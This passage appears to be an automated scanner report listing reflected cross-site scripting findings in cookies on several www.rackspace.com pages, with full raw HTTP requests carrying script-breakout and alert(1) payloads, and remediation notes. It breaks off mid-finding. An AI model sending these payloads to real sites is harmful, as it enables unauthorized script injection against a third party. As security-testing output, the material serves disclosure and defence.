The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1564"><script>alert(1)</script>661a78b0f87 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/storage/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Df1564"><script>alert(1)</script>661a78b0f87; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 424d3"><script>alert(1)</script>4866eb29730 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/customers/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8424d3"><script>alert(1)</script>4866eb29730; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52a7d"%3balert(1)//7794083a84 was submitted in the IS_UASrackuid cookie. This input was echoed as 52a7d";alert(1)//7794083a84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/customers/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f852a7d"%3balert(1)//7794083a84; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 233a3"><script>alert(1)</script>7f8715196cc was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/customers/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D233a3"><script>alert(1)</script>7f8715196cc; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ebad"%3balert(1)//29cb4cbffb7 was submitted in the chatslider cookie. This input was echoed as 2ebad";alert(1)//29cb4cbffb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/customers/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D2ebad"%3balert(1)//29cb4cbffb7; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ac85"%3balert(1)//ce075f08605 was submitted in the IS_UASrackuid cookie. This input was echoed as 7ac85";alert(1)//ce075f08605 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/dedicatedteam.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87ac85"%3balert(1)//ce075f08605; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:10:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 42672
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a89f5"><script>alert(1)</script>4e8c9114acd was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/dedicatedteam.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a89f5"><script>alert(1)</script>4e8c9114acd; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c9e2"%3balert(1)//6813a524c1d was submitted in the chatslider cookie. This input was echoed as 2c9e2";alert(1)//6813a524c1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/dedicatedteam.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D2c9e2"%3balert(1)//6813a524c1d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e5a1"><script>alert(1)</script>46d87369da7 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/dedicatedteam.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D1e5a1"><script>alert(1)</script>46d87369da7; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd6ae"%3balert(1)//ef442455836 was submitted in the IS_UASrackuid cookie. This input was echoed as bd6ae";alert(1)//ef442455836 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8bd6ae"%3balert(1)//ef442455836; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:10:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 38450
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16e00"><script>alert(1)</script>f5d83711d59 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f816e00"><script>alert(1)</script>f5d83711d59; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3ec"><script>alert(1)</script>ee0c24c0430 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
